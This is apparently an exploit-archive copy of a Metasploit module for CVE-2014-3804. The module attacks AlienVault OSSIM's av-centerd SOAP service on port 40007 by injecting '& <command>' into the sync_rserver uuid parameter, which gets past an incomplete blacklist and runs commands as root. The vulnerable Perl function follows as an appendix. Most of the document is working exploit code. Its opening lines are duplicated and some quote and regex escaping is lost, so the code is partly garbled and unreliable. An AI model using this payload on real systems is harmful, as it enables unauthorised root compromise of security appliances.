Alienvault OSSIM av-centerd Util.pm sync rserver Command Execution

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient

def initialize
super(
require 'msf/core'

class MetasploitModule < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient

def initialize
super(
'Name' => 'Alienvault OSSIM av-centerd Util.pm sync_rserver Command Execution',
'Description' => %q{
This module exploits a command injection vulnerability found within the sync_rserver
function in Util.pm. The vulnerability is triggered due to an incomplete blacklist
during the parsing of the $uuid parameter. This allows for the escaping of a system
command allowing for arbitrary command execution as root
},
'References' =>
[
[ 'CVE', '2014-3804' ],
[ 'ZDI', '14-197' ],
[ 'URL', 'http://forums.alienvault.com/discussion/2690' ],
],
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Jun 11 2014')

register_options([
Opt::RPORT(40007),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('CMD', [ false, 'This is the file to download', 'touch /tmp/file.txt'])
], self.class)

end

def run

soap = "<?xml version="1.0" encoding="UTF-8"?> "
soap += "<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" "
soap += "xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" "
soap += "xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" "
soap += "soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> "
soap += "<soap:Body> "
soap += "<sync_rserver xmlns="AV/CC/Util"> "
soap += "<c-gensym3 xsi:type="xsd:string">All</c-gensym3> "
soap += "<c-gensym5 xsi:type="xsd:string">& #{datastore['CMD']} </c-gensym5> "
soap += "<c-gensym7 xsi:type="xsd:string">#{datastore['RHOST']}</c-gensym7> "
soap += "<c-gensym9 xsi:type="xsd:string">#{Rex::Text.rand_text_alpha(4 + rand(4))}</c-gensym9> "
soap += "</sync_rserver> "
soap += "</soap:Body> "
soap += "</soap:Envelope> "

res = send_request_cgi(
{
'uri' => '/av-centerd',
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap,
'headers' => {
'SOAPAction' => ""AV/CC/Util#sync_rserver""
}
}, 20)

if res && res.code == 200
print_good("Command executed successfully!")
else
print_bad("Something went wrong...")
end

end

end
__END__

/usr/share/alienvault-center/lib/AV/CC/Util.pm

sub sync_rserver
{
my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname ) = @_;
verbose_log_file(
"SYNC RSERVER TASK : Received call from $uuid : ip source = $admin_ip, hostname = $hostname:($funcion_llamada,$nombre)"
);

if ($uuid =~ /[;`$<>|]/) {
console_log_file("Not allowed uuid: $uuid in sync_rserver ");
my @ret = ("Error");
return @ret;
}

my $conn = Avtools::get_database();
my $sqlfile = "/tmp/sync_${uuid}.sql";
my $sqlfile_old = "/tmp/sync_${uuid}.sql.old";
my $sqlfile_md5 = `md5sum $sqlfile | awk '{print $1}'`;
my $sqlfile_content;
my $status = 1;
my $counter = 0;
my @ret;
my $query = qq{};
my $dbq;

if ( -f $sqlfile_old )
{
my $sqlfile_old_md5 = `md5sum $sqlfile_old | awk '{print $1}'`;
debug_log_file ("Old MD5: $sqlfile_old_md5 New MD5: $sqlfile_md5");
if ( $sqlfile_md5 eq $sqlfile_old_md5 )
{
unlink $sqlfile;
verbose_log_file ("Already sync'ed!");
return "0";
}
else
{
unlink $sqlfile_old;
}
}

my $query_array = `ossim-db < $sqlfile 2>&1`;
$query_array =~ s/[s ]+$//g;
if ($query_array ne '')
{
$status = $query_array;
}
else
{
$status = 0;
}

if ( ! (defined $status) or $status == 0 )
{
if ( grep /RESTARTsOSSIM-SERVER/, $sqlfile )
{
verbose_log_file("RESTART OSSIM-SERVER MARK found. Restarting ossim-server");
system('/etc/init.d/ossim-server restart');
}
else
{
debug_log_file("RESTART OSSIM-SERVER MARK not found. Skipping ossim-server restart");
}

$query = qq{REPLACE INTO alienvault.config (conf, value) VALUES ('latest_asset_change', utc_timestamp())};
debug_log_file($query);
$dbq = $conn->prepare($query);
$dbq->execute();
$dbq->finish();
}
else
{
verbose_log_file ("Error syncing rservers: ${status}");
}

debug_log_file("Move file: $sqlfile");
move ($sqlfile, $sqlfile . ".old");

# push @ret, "0";
return "0";
}